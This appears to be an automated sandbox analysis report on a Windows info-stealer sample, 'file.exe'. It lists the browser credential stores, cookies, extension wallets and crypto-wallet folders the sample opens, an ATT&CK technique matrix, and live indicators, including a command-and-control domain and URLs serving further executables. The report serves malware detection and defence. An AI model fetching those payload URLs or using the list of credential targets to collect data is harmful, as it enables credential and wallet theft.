          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ATJBEMHSSBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ATJBEMHSSBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BWETZDQDIBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
          Source: Yara matchFile source: 00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          12
          Process Injection
          34
          Virtualization/Sandbox Evasion
          2
          OS Credential Dumping
          761
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          12
          Process Injection
          LSASS Memory34
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol41
          Data from Local System
          11
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Obfuscated Files or Information
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Software Packing
          NTDS1
          File and Directory Discovery
          Distributed Component Object ModelInput Capture114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets223
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561691 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 property-imper.sbs 2->28 30 js.monitor.azure.com 2->30 32 aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net 2->32 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 5 other signatures 2->50 8 file.exe 12 2->8         started        signatures3 process4 dnsIp5 34 185.215.113.16, 49761, 80 WHOLESALECONNECTIONSNL Portugal 8->34 36 property-imper.sbs 104.21.33.116, 443, 49703, 49705 CLOUDFLARENETUS United States 8->36 52 Detected unpacking (changes PE section rights) 8->52 54 Query firmware table information (likely to detect VMs) 8->54 56 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->56 58 9 other signatures 8->58 12 chrome.exe 1 8->12         started        15 chrome.exe 8->15         started        signatures6 process7 dnsIp8 38 192.168.2.7, 123, 138, 443 unknown unknown 12->38 40 192.168.2.23 unknown unknown 12->40 42 239.255.255.250 unknown Reserved 12->42 17 chrome.exe 12->17         started        20 chrome.exe 15->20         started        process9 dnsIp10 22 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49704, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->22 24 www.google.com 142.250.181.100, 443, 49810, 50069 GOOGLEUS United States 17->24 26 6 other IPs or domains 17->26

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://property-imper.sbs/09140%Avira URL Cloudsafe
          https://property-imper.sbs/apiY0%Avira URL Cloudsafe
          https://property-imper.sbs/t0%Avira URL Cloudsafe
          http://185.2150%Avira URL Cloudsafe
          https://property-imper.sbs:443/api90%Avira URL Cloudsafe
          https://property-imper.sbs/apiz0%Avira URL Cloudsafe
          https://property-imper.sbs/apiO0%Avira URL Cloudsafe
          https://property-imper.sbs/api=0%Avira URL Cloudsafe
          https://property-imper.sbs/api60%Avira URL Cloudsafe
          http://185.215.113.16/off/def.exe(w0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          property-imper.sbs
          104.21.33.116
          truefalse
            high
            www.google.com
            142.250.181.100
            truefalse
              high
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                js.monitor.azure.com
                unknown
                unknownfalse
                  high
                  mdec.nelreports.net
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://property-imper.sbs/apifalse
                      high
                      https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_114.7.drfalse
                          high
                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://property-imper.sbs/0914file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_114.7.drfalse
                                high
                                https://www.linkedin.com/cws/share?url=$chromecache_94.7.dr, chromecache_106.7.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://property-imper.sbs/tfile.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Youssef1313chromecache_114.7.drfalse
                                      high
                                      https://property-imper.sbs/apiYfile.exe, 00000000.00000003.1476241587.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432777993.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516306485.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_94.7.dr, chromecache_106.7.drfalse
                                        high
                                        https://aka.ms/msignite_docs_bannerchromecache_94.7.dr, chromecache_106.7.drfalse
                                          high
                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_106.7.drfalse
                                            high
                                            http://polymer.github.io/AUTHORS.txtchromecache_94.7.dr, chromecache_106.7.drfalse
                                              high
                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_114.7.drfalse
                                                high
                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_94.7.dr, chromecache_106.7.drfalse
                                                  high
                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_114.7.drfalse
                                                    high
                                                    http://x1.c.lencr.org/0file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pshelpmechoosechromecache_94.7.dr, chromecache_106.7.drfalse
                                                          high
                                                          https://aka.ms/feedback/report?space=61chromecache_114.7.dr, chromecache_78.7.drfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://learn-video.azurefd.net/vod/playerchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                high
                                                                https://twitter.com/intent/tweet?original_referer=$chromecache_94.7.dr, chromecache_106.7.drfalse
                                                                  high
                                                                  https://github.com/gewarrenchromecache_114.7.drfalse
                                                                    high
                                                                    http://185.215file.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.1722892264.000000000113B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://polymer.github.io/CONTRIBUTORS.txtchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                          high
                                                                          https://property-imper.sbs/apizfile.exe, 00000000.00000003.1409218588.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409832918.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409489187.000000000139E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_114.7.drfalse
                                                                            high
                                                                            https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_114.7.drfalse
                                                                              high
                                                                              https://client-api.arkoselabs.com/v2/api.jschromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                high
                                                                                https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                  high
                                                                                  https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                    high
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://property-imper.sbs:443/api9file.exe, 00000000.00000003.1364151872.000000000138C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://github.com/Thrakachromecache_114.7.drfalse
                                                                                        high
                                                                                        http://polymer.github.io/PATENTS.txtchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                          high
                                                                                          https://aka.ms/certhelpchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                            high
                                                                                            http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/mairawchromecache_114.7.drfalse
                                                                                                      high
                                                                                                      http://www.microsoft.file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://schema.orgchromecache_106.7.drfalse
                                                                                                            high
                                                                                                            http://polymer.github.io/LICENSE.txtchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://property-imper.sbs/file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://aka.ms/yourcaliforniaprivacychoiceschromecache_114.7.drfalse
                                                                                                                      high
                                                                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/nschonnichromecache_114.7.drfalse
                                                                                                                          high
                                                                                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/adegeochromecache_114.7.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/jonschlinkert/is-plain-objectchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                                high
